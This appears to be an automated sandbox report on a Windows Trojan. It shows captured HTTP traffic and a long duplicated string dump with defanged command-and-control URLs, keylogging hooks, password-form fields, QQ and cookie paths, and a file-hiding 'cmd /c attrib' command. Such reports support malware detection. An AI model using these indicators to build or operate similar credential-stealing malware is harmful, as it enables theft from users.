<?xml version="1.0" encoding="iso-8859-1"?>.<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="en" lang="en">. <head>. <title>404 - Not Found</title>. </head>. <body>. <h1>404 - Not Found</h1>. </body>.</html>.HTTP/1.1 404 Not Found..Server: openresty..Date: Wed, 05 Oct 2016 23:16:54 GMT..Content-Type: text/html..Content-Length: 345..Connection: keep-alive..Set-Cookie: BAEID=61048F546A35CDB463F5F04B98D1F275; expires=Thu, 05-Oct-17 23:16:54 GMT; max-age=31536000; path=/; version=1..<?xml version="1.0" encoding="iso-8859-1"?>.<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="en" lang="en">. <head>. <title>404 - Not Found</title>. </head>. <body>. <h1>404 - Not Found</h1>. </body>.</html>...
GET /s?q=aaaçŸä¿¡è½°ç‚¸ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.haosou.com
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Wed, 05 Oct 2016 23:17:09 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXp://VVV.so.com/s?q=aaaçŸä¿¡è½°ç‚¸
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>....
GET /s?q=aaaçŸä¿¡è½°ç‚¸æœº HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.haosou.com
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Wed, 05 Oct 2016 23:17:05 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXp://VVV.so.com/s?q=aaaçŸä¿¡è½°ç‚¸æœº
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>....
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_1460:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
t%SVh
t%SVh
t$(SSh
t$(SSh
~%UVW
~%UVW
u$SShe
u$SShe
exdui.dll
exdui.dll
gdiplus.dll
gdiplus.dll
kernel32.dll
kernel32.dll
GdiPlus.dll
GdiPlus.dll
Kernel32.dll
Kernel32.dll
user32.dll
user32.dll
Ole32.dll
Ole32.dll
OleAut32.dll
OleAut32.dll
User32.dll
User32.dll
advapi32.dll
advapi32.dll
ole32.dll
ole32.dll
shlwapi.dll
shlwapi.dll
wininet.dll
wininet.dll
Psapi.dll
Psapi.dll
ntdll.dll
ntdll.dll
Wininet.dll
Wininet.dll
advpack.dll
advpack.dll
Powrprof.dll
Powrprof.dll
gdi32.dll
gdi32.dll
Gdi32.dll
Gdi32.dll
shell32.dll
shell32.dll
imm32.dll
imm32.dll
dbghelp.dll
dbghelp.dll
oleaut32.dll
oleaut32.dll
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
ExitWindowsEx
ExitWindowsEx
EnumChildWindows
EnumChildWindows
keybd_event
keybd_event
InternetOpenUrlA
InternetOpenUrlA
ShellExecuteA
ShellExecuteA
GetProcessHeap
GetProcessHeap
SetThreadExecutionState
SetThreadExecutionState
GetAsyncKeyState
GetAsyncKeyState
GdipSetStringFormatHotkeyPrefix
GdipSetStringFormatHotkeyPrefix
RegisterHotKey
RegisterHotKey
UnregisterHotKey
UnregisterHotKey
FtpCreateDirectoryA
FtpCreateDirectoryA
FtpRemoveDirectoryA
FtpRemoveDirectoryA
FtpGetFileA
FtpGetFileA
FtpFindFirstFileA
FtpFindFirstFileA
FtpSetCurrentDirectoryA
FtpSetCurrentDirectoryA
FtpGetCurrentDirectoryA
FtpGetCurrentDirectoryA
FtpDeleteFileA
FtpDeleteFileA
FtpRenameFileA
FtpRenameFileA
FtpPutFileA
FtpPutFileA
FtpOpenFileA
FtpOpenFileA
FtpGetFileSize
FtpGetFileSize
mg.LJ
mg.LJ
AOC:\Windows\System\MemorandumList.txt
AOC:\Windows\System\MemorandumList.txt
C:\Windows\System\background_image_main.jpg
C:\Windows\System\background_image_main.jpg
.cxy8sx9
.cxy8sx9
18,43,43,87,
18,43,43,87,
54,11,24,
54,11,24,
Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_VideoController")
Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_VideoController")
GetTrait ="1:"&Obj.Caption&" 2:"&Obj.AdapterRAM&" 3:"&Obj.VideoProcessor
GetTrait ="1:"&Obj.Caption&" 2:"&Obj.AdapterRAM&" 3:"&Obj.VideoProcessor
Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_OperatingSystem")
Set WMI =GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_OperatingSystem")
GetTrait = "[t]"&Obj.InstallDate&"[t][s]"&round(Obj.TotalVisibleMemorySize/1024,0)&"MB[s]"
GetTrait = "[t]"&Obj.InstallDate&"[t][s]"&round(Obj.TotalVisibleMemorySize/1024,0)&"MB[s]"
MsgBox
MsgBox
SysShadow.SubWnd
SysShadow.SubWnd
iTXtXML:com.adobe.xmp
iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> #
" id="W5M0MpCehiHzreSzNTczkc9d"?> #
[ip_url_s]
[ip_url_s]
WinHttp.WinHttpRequest.5.1
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
hXXp://VVV.db-ha.com/tool/get_date.php
hXXp://VVV.db-ha.com/tool/get_date.php
hXXp://cgi.im.qq.com/cgi-bin/cgi_svrtime
hXXp://cgi.im.qq.com/cgi-bin/cgi_svrtime
hXXp://time.dxhz.vip/
hXXp://time.dxhz.vip/
hXXp://time.aaa-info.vip/
hXXp://time.aaa-info.vip/
hXXp://VVV.v-update.com/t.php
hXXp://VVV.v-update.com/t.php
hXXp://VVV.b-update.com/t.php
hXXp://VVV.b-update.com/t.php
/best_house.php
/best_house.php
&userKey=
&userKey=
115645421
115645421
13132132
13132132
!**[/]*?
!**[/]*?
[qxmurl]
[qxmurl]
[ipUrl]
[ipUrl]
[phone_num_url]
[phone_num_url]
[ymzq_url]
[ymzq_url]
/synchronous/synchronous.php
/synchronous/synchronous.php
https
https
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36
http=
http=
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
hXXps://
hXXps://
hXXp://
hXXp://
hXXp://71809.vhost29.boxcdn.cn/TeaManager.html
hXXp://71809.vhost29.boxcdn.cn/TeaManager.html
hXXp://1.musql.sinaapp.com/tool/sendBug.php
hXXp://1.musql.sinaapp.com/tool/sendBug.php
&key_2=
&key_2=
sos=1&key_1=
sos=1&key_1=
[url]
[url]
\aaafz.ini
\aaafz.ini
1999-09-09 19:19:19
1999-09-09 19:19:19
hXXp://VVV.db-ha.com/
hXXp://VVV.db-ha.com/
hXXp://VVV.v-update.com/
hXXp://VVV.v-update.com/
hXXp://VVV.l-last.win/
hXXp://VVV.l-last.win/
hXXp://VVV.l-loan.loan
hXXp://VVV.l-loan.loan
hXXp://VVV.l-last.win/
hXXp://VVV.l-last.win/
hXXp://VVV.aaa-info.vip/
hXXp://VVV.aaa-info.vip/
hXXp://VVV.aaa-info.vip/
hXXp://VVV.aaa-info.vip/
hXXp://VVV.z-win.win/
hXXp://VVV.z-win.win/
[back_url]
[back_url]
[skype_url]
[skype_url]
[admin_url]
[admin_url]
[xmlHttp_GetInfo]
[xmlHttp_GetInfo]
[xmlHttp_AddCode]
[xmlHttp_AddCode]
[http-s]
[http-s]
[http-l]
[http-l]
[qiangz_url]
[qiangz_url]
hXXp://site.dxhz.vip/
hXXp://site.dxhz.vip/
[emsg]
[emsg]
[msg]
[msg]
hXXp://sysboom.duapp.com/music/url.txt
hXXp://sysboom.duapp.com/music/url.txt
hXXp://sysboom.duapp.com
hXXp://sysboom.duapp.com
@1970-01-01 08:00:00
@1970-01-01 08:00:00
application/x-www-form-urlencoded
application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies
\*.txt
\*.txt
&key=
&key=
open_url_lalala_w
open_url_lalala_w
\Tencent\QQ\Misc\*.*
\Tencent\QQ\Misc\*.*
/Mail.php
/Mail.php
\host_ip.txt
\host_ip.txt
*.txt
*.txt
|*.txt
|*.txt
User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.0; MyIE2; .NET CLR 1.1.4322)
User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.0; MyIE2; .NET CLR 1.1.4322)
aaafz.ini
aaafz.ini
_en.exe
_en.exe
%WinDir%\
%WinDir%\
TStdHttpAnalyzerForm
TStdHttpAnalyzerForm
%f%%f
%f%%f
7".Fv
7".Fv
>.OsM
>.OsM
r.vDO
r.vDO
,uy.vj
,uy.vj
.z[.Rtp
.z[.Rtp
qiTXtXML:com.adobe.xmp
qiTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
!iTXtXML:com.adobe.xmp
!iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
"iTXtXML:com.adobe.xmp
"iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> G7
" id="W5M0MpCehiHzreSzNTczkc9d"?> G7
iTXtXML:com.adobe.xmp
iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
c-V}Sk^
c-V}Sk^
.pNA$ }C
.pNA$ }C
ImageMagick 6.8.8-7 Q16 x86_64 2014-02-28 hXXp://VVV.imagemagick.orgY
ImageMagick 6.8.8-7 Q16 x86_64 2014-02-28 hXXp://VVV.imagemagick.orgY
1398346191
1398346191
file:///home/ftp/1520/easyicon.cn/easyicon.cn/cdn-img.easyicon.cn/png/11495/1149545.png
file:///home/ftp/1520/easyicon.cn/easyicon.cn/cdn-img.easyicon.cn/png/11495/1149545.png
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
:15.0.0.0:80
:15.0.0.0:80
:1.0.0.0:8
:1.0.0.0:8
:*.*.*.*:**
:*.*.*.*:**
[1][0-9]{10}
[1][0-9]{10}
hXXp://m.ip138.com/mobile.asp?mobile=
hXXp://m.ip138.com/mobile.asp?mobile=
" id="W5M0MpCehiHzreSzNTczkc9d"?> 0@z$
" id="W5M0MpCehiHzreSzNTczkc9d"?> 0@z$
" id="W5M0MpCehiHzreSzNTczkc9d"?> *b)
" id="W5M0MpCehiHzreSzNTczkc9d"?> *b)
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
>i!M.".eH/;
>i!M.".eH/;
" id="W5M0MpCehiHzreSzNTczkc9d"?> =J,6
" id="W5M0MpCehiHzreSzNTczkc9d"?> =J,6
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
1Kw%C
1Kw%C
hXXp://VVV.baidu.com/s?wd=
hXXp://VVV.baidu.com/s?wd=
\historyRecord.txt
\historyRecord.txt
.IDATx
.IDATx
function time(){return Math.random()}
function time(){return Math.random()}
/new_par/isonLine.php
/new_par/isonLine.php
/UserFriedManager.php
/UserFriedManager.php
hXXps://VVV.baidu.com/s?wd=
hXXps://VVV.baidu.com/s?wd=
\exdui.dll
\exdui.dll
C:\Windows\System\exdui.dll
C:\Windows\System\exdui.dll
z.vkDL"
z.vkDL"
Riched20.dll
Riched20.dll
Microsoft.XMLDOM
Microsoft.XMLDOM
number is %d.
number is %d.
:"%s"
:"%s"
%:.NG2r8%4/h
%:.NG2r8%4/h
KERNEL32.DLL
KERNEL32.DLL
ADVAPI32.dll
ADVAPI32.dll
ATL.DLL
ATL.DLL
GDI32.dll
GDI32.dll
MSVCRT.dll
MSVCRT.dll
OLEAUT32.dll
OLEAUT32.dll
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
USER32.dll
USER32.dll
cmd /c attrib s a h r
cmd /c attrib s a h r
cmd /c
cmd /c
/user_string/get.php?u=
/user_string/get.php?u=
/sendEmail/SendIsNew.php
/sendEmail/SendIsNew.php
%WinDir%\aaafz_begin.bat
%WinDir%\aaafz_begin.bat
/user_string/add.php
/user_string/add.php
/UserHelper/xmlHttp_AddCode.php
/UserHelper/xmlHttp_AddCode.php
http:
http:
" id="W5M0MpCehiHzreSzNTczkc9d"?> "v
" id="W5M0MpCehiHzreSzNTczkc9d"?> "v
/UserHelper/xmlHttp_GetInfo.php
/UserHelper/xmlHttp_GetInfo.php
/UserHelper/xmlHttp_SetUserInfo.php
/UserHelper/xmlHttp_SetUserInfo.php
hXXp://api.ysdm.net/register.xml
hXXp://api.ysdm.net/register.xml
hXXp://api.ysdm.net/info.xml
hXXp://api.ysdm.net/info.xml
hXXp://api.ysdm.net/recharge.xml
hXXp://api.ysdm.net/recharge.xml
hXXp://api.ysdm.net/create.xml
hXXp://api.ysdm.net/create.xml
hXXp://api.ysdm.net/reporterror.xml
hXXp://api.ysdm.net/reporterror.xml
crText
crText
Report
Report
themepassword
themepassword
SysShadow.HostWnd
SysShadow.HostWnd
dwmapi.dll
dwmapi.dll
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
VBScript.RegExp
VBScript.RegExp
PasswordChar
PasswordChar
crTextSel
crTextSel
SysShadow.Menu
SysShadow.Menu
fiTXtXML:com.adobe.xmp
fiTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> _
" id="W5M0MpCehiHzreSzNTczkc9d"?> _
" id="W5M0MpCehiHzreSzNTczkc9d"?> $GK
" id="W5M0MpCehiHzreSzNTczkc9d"?> $GK
&password=
&password=
&softkey=
&softkey=
Content-Disposition: form-data; name="password"
Content-Disposition: form-data; name="password"
{pass}
{pass}
Content-Disposition: form-data; name="softkey"
Content-Disposition: form-data; name="softkey"
{softkey}
{softkey}
Content-Disposition: form-data; name="image"; filename="System.Byte[]"
Content-Disposition: form-data; name="image"; filename="System.Byte[]"
SetClientCertificate
SetClientCertificate
Login
Login
%d&&'
%d&&'
123456789
123456789
00003333
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
Q%*.*f
Q%*.*f
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
COMCTL32.DLL
COMCTL32.DLL
CCmdTarget
CCmdTarget
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
iphlpapi.dll
iphlpapi.dll
MPR.dll
MPR.dll
WINMM.dll
WINMM.dll
WS2_32.dll
WS2_32.dll
VERSION.dll
VERSION.dll
RASAPI32.dll
RASAPI32.dll
RPCRT4.dll
RPCRT4.dll
WinExec
WinExec
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
GetViewportOrgEx
GetViewportOrgEx
WINSPOOL.DRV
WINSPOOL.DRV
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyA
RegCreateKeyA
RegCreateKeyExA
RegCreateKeyExA
COMCTL32.dll
COMCTL32.dll
WSOCK32.dll
WSOCK32.dll
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
WININET.dll
WININET.dll
GetCPInfo
GetCPInfo
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetViewportExtEx
comdlg32.dll
comdlg32.dll
.PAVCException@@
.PAVCException@@
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
.PAVCFileException@@
.PAVCFileException@@
: %d]
: %d]
(*.*)|*.*||
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
\\.\Scsi0:
\\.\Scsi0:
\\.\PhysicalDrive0
\\.\PhysicalDrive0
%s:%d
%s:%d
windows
windows
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
out.prn
out.prn
(*.prn)|*.prn|
(*.prn)|*.prn|
%d.%d
%d.%d
%d/%d
%d/%d
1.6.9
1.6.9
unsupported zlib version
unsupported zlib version
png_read_image: unsupported transformation
png_read_image: unsupported transformation
%d / %d
%d / %d
Bogus message code %d
Bogus message code %d
libpng error: %s
libpng error: %s
libpng warning: %s
libpng warning: %s
1.1.3
1.1.3
bad keyword
bad keyword
libpng does not support gamma background rgb_to_gray
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
Palette is NULL in indexed image
(%d-%d):
(%d-%d):
%ld%c
%ld%c
VVV.dywt.com.cn
VVV.dywt.com.cn
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
HTTP/1.0
%s
%s
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
window %s handle %d
window %s handle %d
play %s from %d
play %s from %d
play %s
play %s
status %s position
status %s position
close %s
close %s
Bag pipe
Bag pipe
%d%d%d
%d%d%d
rundll32.exe shell32.dll,
rundll32.exe shell32.dll,
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCArchiveException@@
zcÁ
zcÁ
right-curly-bracket
right-curly-bracket
left-curly-bracket
left-curly-bracket
0123456789
0123456789
The URL has moved here
The URL has moved here
"hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
"hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
c:\%original file name%.exe
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
#include "l.chs\afxres.rc" // Standard components
1.0.0.0
1.0.0.0
(*.*)
(*.*)
2.3.1.3
2.3.1.3
%original file name%.exe_1460_rwx_00E20000_00013000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
1.2.3
1.2.3
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
inflate 1.2.3 Copyright 1995-2005 Mark Adler
%c%c%c%c%c%c%c%c%c%c
%c%c%c%c%c%c%c%c%c%c
MSVCRT.dll
MSVCRT.dll
KERNEL32.dll
KERNEL32.dll
zlib1.dll
zlib1.dll
!"#$%&'()* ,-./012
!"#$%&'()* ,-./012
DLL support by Alessandro Iacopetti & Gilles Vollant
DLL support by Alessandro Iacopetti & Gilles Vollant
%original file name%.exe_1460_rwx_10001000_0002C000:
f9z.vk
f9z.vk
Riched20.dll
Riched20.dll
Riched32.dll
Riched32.dll
{00000000-0000-0000-C000-000000000046}
{00000000-0000-0000-C000-000000000046}
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
Microsoft.XMLDOM
Microsoft.XMLDOM
z>Advapi32.dll
z>Advapi32.dll
advapi32.dll
advapi32.dll
kernel32.dll
kernel32.dll
ntdll.dll
ntdll.dll
user32.dll
user32.dll
gdi32.dll
gdi32.dll
ole32.dll
ole32.dll
Ole32.dll
Ole32.dll
shell32.dll
shell32.dll
atl.dll
atl.dll
GdiPlus.dll
GdiPlus.dll
GetProcessHeap
GetProcessHeap
program internal error number is %d.
program internal error number is %d.
:"%s"
:"%s"
:"%s".
:"%s".
%:.NG2r8%4/h
%:.NG2r8%4/h
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
.reloc
.reloc
number is %d.
number is %d.